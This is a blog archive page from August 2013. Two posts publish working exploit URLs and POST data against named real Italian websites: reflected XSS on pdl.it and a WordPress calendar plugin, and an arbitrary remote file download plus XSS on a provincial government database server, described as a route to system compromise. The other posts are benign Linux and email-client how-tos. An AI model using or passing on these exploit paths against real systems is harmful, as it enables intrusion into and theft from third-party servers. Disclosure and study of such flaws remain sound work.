Skip to main content

Posts

Showing posts from August, 2013

pdl.it | XSS

 XSS sample  http://servizi.pdl.it/cartoline/ancora-in-campo-per-l-italia/cartolina.php?img=ancora-in-campo-per-l-italia.jpg&ico=ancora-in-campo-per-l-italia-ico.jpg&lnk=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22bene.php&cartolina=1 also other arguments can be used for the XSS XSS on another site with wordpress http://www.gruppopdl-berlusconipresidente.it/wp-admin/admin-ajax.php?action=spiderbigcalendar&theme_id=3&calendar=1&date=2015-08&many_sp_calendar=1&cur_page_url=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail)

Access emails from Outlook Web Access with any client email (ex. thunerbird, outlook express, outlook, evolution, pegasus, eudora, foxmail) If you are in hurry to download/access all your emails stored (only) on "Outlook Web Access" you can try those softwares: - DavMail - http://sourceforge.net/projects/davmail/ - for windows 7, windows 8, windows vista, windows xp, linux, MacOsX - freepops + owa.lua - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X, BeOS . - Thunderbird + ExQuilla - for windows 7, windows 8, windows vista, windows xp, linux, MacOs X The most generic and rapid is DavMail

ecadb.provincia.fe.it | remote files download, XSS, System compromise

http://ecadb.provincia.fe.it/samiraeca/fe/getimage.do?file={your file} (requests shouldn't be done via browser but with a simple client) _________________________________________ XSS http://ecadb.provincia.fe.it/samiraeca/fe/ricercalibera.do Just use a a simple search with a term that can be found (ex. "este") and the option to find any submitted word este <script>alert(1);</script> Sample POST DATA value%28VALUE%29=este+%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E&value%28TYPE%29=7&value%28OPTION%29=1&value%28TSK%29=scheda_eca&fromform=1 _________________________________________ Etc

install flash player on lubuntu ubuntu debian older versions | browser chromium, firefox

download: install_flash_player_11_linux.i386.tar.gz from the official adobe website uncompress the tar.gz file tar xvf install_flash_player_11_linux.i386.tar.gz chromium (in my case Version 25.0.1364.160 Ubuntu 11.10 (25.0.1364.160-0ubuntu0.11.10.1) ) $ sudo cp libflashplayer.so /usr/lib/chromium-browser/plugins/ Mozilla (make sure that you have installed it and the folder exists) $ sudo cp libflashplayer.so ~/.mozilla/plugin/ and copy all the other files $ cp -R ./usr/* /usr/ This should work to use flash player on Mozilla firefox and Chromium. It applies even if (the older) pepper flash doesn't work. A workaround can be done with the same procedure and the latest versions of adobe flash. Supported OS : Linux Lubuntu Flash Player Linux Debian Linux Ubuntu Linux Red Hat

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem

easy WPA on linux lubuntu/ubuntu/debian with GUI User Interface - easy way to use wpa without bad password problem For example on Lubuntu we have the network manager that is not acting like expected and the same goes for wpa supplicant (see below) wpa supplicant installation (NOT SUGGESTED) wpa supplicant can be installed with those simple commands $ sudo apt-get install wpasupplicant and (if you want the gui) $ sudo apt-get install wpagui with the main problem is that wpagui doesn't recognize several wifi cards even if available from iwconfig (just read other tutorials if you don't even have the wifi network card shown via iwconfig). As example this card doesn't show up with wpagui (on lubuntu 11): description: Wireless interface product: PRO/Wireless 2200BG [Calexico2] Network Connection vendor: Intel Corporation ________________________ Fast Solution:  Just install Wicd by using: $ sudo apt-get install wicd If you are still unable to use the wif